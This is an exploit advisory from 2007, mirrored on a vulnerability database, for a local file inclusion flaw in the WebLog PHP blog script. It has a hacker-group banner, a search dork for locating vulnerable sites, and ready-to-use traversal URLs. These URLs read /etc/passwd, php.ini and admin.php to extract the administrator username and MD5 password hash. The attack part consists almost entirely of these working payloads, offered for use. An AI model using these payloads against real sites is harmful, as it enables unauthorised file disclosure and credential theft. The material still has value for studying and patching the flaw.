Lucene search
SecurityvulnsSECURITYVULNS:DOC:16398HistoryMar 17, 2007 - 12:00 a.m.
WebLog (index.php file) Remote File Disclosure Vulnerability
2007-03-1700:00:00
vulners.com
21
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+____Iranian Are The Best In World+
Portal : weblog
Download : http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
Author : Dj7xpl | [email protected]
Dork : "(C) by CyberTeddy"
Class : Local File Inclusion Exploit
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
Exploit : http://[target]/[path]/index.php?show=showarticles&file=[local-file]
Example : http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php <<< username&password(md5)
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …
+_______________________________________________________________________________________________________________________+